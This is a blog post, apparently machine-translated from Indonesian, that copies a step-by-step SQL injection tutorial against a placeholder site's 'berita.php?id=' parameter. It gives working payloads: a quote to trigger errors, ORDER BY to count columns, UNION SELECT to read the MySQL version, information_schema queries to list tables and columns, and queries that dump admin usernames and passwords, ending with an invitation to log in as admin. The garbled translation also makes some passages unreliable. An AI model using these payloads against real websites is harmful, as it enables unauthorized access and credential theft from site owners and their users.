web hacking or commonly called a web attack is very much a way, one of them by way of SQL injection.
What is SQL injection?
SQL injection occurs when an attacker could insert some SQL statements to 'query'
by way of manipulation of input data to the application TSB.
this is one way of doing SQL injection techniques, this way I copas from http://jasakom.com by an author named it cruz3N
OK, let's look together.
1. The first time we did of course find the target. For example our target this time is http://www.target.com/berita.php?id=100
2. Add the characters' at the end of the url or add the character "-" to see if there is an error message.
example :
http://www.target.com/berita.php?id=100'
or
http://www.target.com/berita.php?id=-100
4. Will display an error message ...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
That manual corresponds to your MySQL server version for the right syntax to use near'''
at line 1 "And more stuff.
5. Next step is to find and count the number of tables that exist in the database ...
Here we will use an order by order
Example:
http://www.target.com/berita.php?id=100+order+by+1/ *
Hohoho ... especially the "/ *"? That is the character cover SQL or we can also pake "--". Whatever aja ...
If "+" as the contact command ...
6. Well here directly dah sampe nyobain satu2 ...
http://www.target.com/berita.php?id=100+order+by+1/ * (not error)
http://www.target.com/berita.php?id=100+order+by+2/ * (we do not have too)
http://www.target.com/berita.php?id=100+order+by+3/ * (tired dah)
http://www.target.com/berita.php?id=100+order+by+4/ * (do not give up)
Until the error appears ...
Suppose the error here ...
http://www.target.com/berita.php?id=100+order+by+10/ *
Means that we take is "9"
http://www.target.com/berita.php?id=100+order+by+9/ *
7. To find out how many numbers that show now we use UNION
Example:
http://www.target.com/news.php?id=100+union+select+1, 2,3,4,5,6,7,8,9 / *
Then note the number how many are out (toggle Kayak aja ..., p)
8. Eg hockey figure out is "3" then who can we'll do is check which version of mysql is using that with the command "version ()" or "@ @ version"
http://www.target.com/news.php?id=100+union+select+1, 2, version (), 4,5,6,7,8,9 / *
Or
http://www.target.com/news.php?id=100+union+select+1, 2, @ @ version, 4,5,6,7,8,9 / *
9. Well if its version 5 directly aja pake command "information_schema" to see the tables and columns exist in the database ...
Example:
http://www.target.com/berita.php?id=100+union+select+1, 2, table_name, 4,5,6,7,8,9 + from + information_schema.tables / *
Now he said if the tables to see who else we add LIMIT at the end of the URL. But this time the cave tables do not use plasticity kok ... What's wrong cave? Maybe, but now that I want to explain is VERSION AND EXPERIENCE THE CAVE. Perhaps a slightly different ... ya know is just learning ... Hehehe ...
For example the table lo clay is "admin"
Well now we liat-liat aja used his column by replacing the word "table" of his ...
Example:
http://www.target.com/berita.php?id=100+union+select+1, 2, column_name, 4,5,6,7,8,9 + from + information_schema.colums / *
For example a column that comes out is "password" and "username"
Jump aja we see it ...
Example:
http://www.target.com/news.php?id=100+union+select+1, username, 3,4,5,6,7,8,9 + from + admin / *
and
http://www.target.com/news.php?id=100+union+select+1, password, 3,4,5,6,7,8,9 + from + admin / *
Can diliat dah ama username password login ... Stay ... Find a cool hold ... It's up to you ...
-------------------------------------------------- -
that's what is written there.
you still do not understand what SQL injection?
quiet please you download the file below document about SQL injection step by step.
good luck!!! :)
No comments:
Post a Comment